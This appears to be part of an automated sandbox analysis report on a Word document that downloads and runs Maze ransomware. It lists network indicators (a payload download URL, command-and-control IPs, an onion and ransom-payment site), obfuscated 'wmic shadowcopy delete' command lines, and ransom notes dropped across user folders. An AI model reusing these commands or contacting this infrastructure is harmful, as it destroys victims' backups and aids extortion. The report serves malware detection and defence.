Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /wordupd.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.198.208Connection: Keep-Alive

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2019 13:03:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 219Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 69 67 6e 6f 75 74 2f 6c 6f 67 69 6e 2f 63 74 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /signou

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE, 00000000.00000002.337456812.07BE2000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.329471285.048B0000.00000004.00000001.sdmp	String found in binary or memory: http://104.168.198.208/wordupd.tmp
Source: WINWORD.EXE, 00000000.00000002.329471285.048B0000.00000004.00000001.sdmp	String found in binary or memory: http://104.168.198.208/wordupd.tmple
Source: WINWORD.EXE, 00000000.00000002.322542209.00412000.00000004.00000001.sdmp	String found in binary or memory: http://104.168.198.208/wordupd.tmpqqC:
Source: wupd12.14.tmp, 00000005.00000003.364936972.01540000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.11/forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6
Source: wupd12.14.tmp, 00000005.00000003.565317575.019F0000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.11/view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x
Source: wupd12.14.tmp, 00000005.00000003.365791961.01540000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.25/frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp
Source: wupd12.14.tmp, 00000005.00000003.565927773.019F0000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.25/tracker/lpvotht.php?ij=74lh01y&if=3h00sur
Source: wupd12.14.tmp, 00000005.00000003.367324708.01540000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.26/post/yocs.jspx?mh=gvs58
Source: wupd12.14.tmp, 00000005.00000003.566591154.019F0000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.26/weu.html?n=641&uy=33vt2
Source: wupd12.14.tmp, 00000005.00000002.596422643.019F0000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.31/kwa.html?hkex=p77mwf5h44&spi=3ylt07ucfg
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	String found in binary or memory: http://91.218.114.31/update/cwmgplanv.jspx?pnv=u&qraq=41g187&g=xu401v60
Source: wupd12.14.tmp, 00000005.00000003.519321430.01540000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.32/checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	String found in binary or memory: http://91.218.114.37/edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	String found in binary or memory: http://91.218.114.38/edit/signout/r.html
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	String found in binary or memory: http://91.218.114.38/edit/signout/r.htmllAez
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmp	String found in binary or memory: http://91.218.114.4/payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4
Source: wupd12.14.tmp, 00000005.00000003.364176697.01550000.00000004.00000001.sdmp	String found in binary or memory: http://91.218.114.4/signout/login/ct.html
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp	String found in binary or memory: http://aoacugmutagkwctu.onion/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	String found in binary or memory: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adbe.
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmp	String found in binary or memory: http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp	String found in binary or memory: https://mazedecrypt.top/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	String found in binary or memory: https://mazedecrypt.top/5e4c085c3c4e0000
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	String found in binary or memory: https://www.torproject.org/

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Maze Ransomware

Show sources

Source: Yara match	File source: 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.587200933.00040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.587056869.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362928581.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wupd12.14.tmp PID: 3780, type: MEMORY
Source: Yara match	File source: Process Memory Space: notepad.exe PID: 1472, type: MEMORY
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara match	File source: C:\DECRYPT-FILES.txt, type: DROPPED

Changes the wallpaper picture

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp

SystemParametersInfo: C:\Users\user~1\AppData\Local\Temp\000.bmp

Jump to behavior

Deletes shadow drive data (may be related to ransomware)

Show sources

Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknown	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Windows\Temp\wupd12.14.tmp	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete	Jump to behavior

May encrypt documents and pictures (Ransomware)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\$recycle.bin\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1001\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1005\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\documents and settings\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\msocache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\perflogs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\perflogs\admin\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\program files\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\recovery\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\recovery\30698442-3747-11e0-818c-d0aae148ac37\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\media center programs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\internet explorer\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\cookies\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\recent\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\sendto\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\appdata\roaming\microsoft\windows\templates\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\desktop\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\documents\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\documents\my music\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\documents\my pictures\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\documents\my videos\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\downloads\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\favorites\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\links\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\default\saved games\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\bin\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\bin\client\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\bin\dtplugin\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\bin\plugin2\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\applet\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\cmm\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\deploy\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\ext\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\fonts\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\i386\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\images\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\images\cursors\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\jfr\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\management\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\security\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\limited\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\.jre\lib\security\policy\unlimited\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\collab\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\forms\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\jscache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\crlcache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\flash player\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\p4mtyzfy\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\headlights\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\linguistics\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\adobe\logtransport2\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\identities\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\identities\{7e3c98c2-a457-4c7b-90bc-6b7522d9bded}\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\media center programs\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\addins\decrypt-files.txt	Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	File created: c:\users\user\appdata\roaming\microsoft\credentials\decrypt-files.txt	Jump to behavior
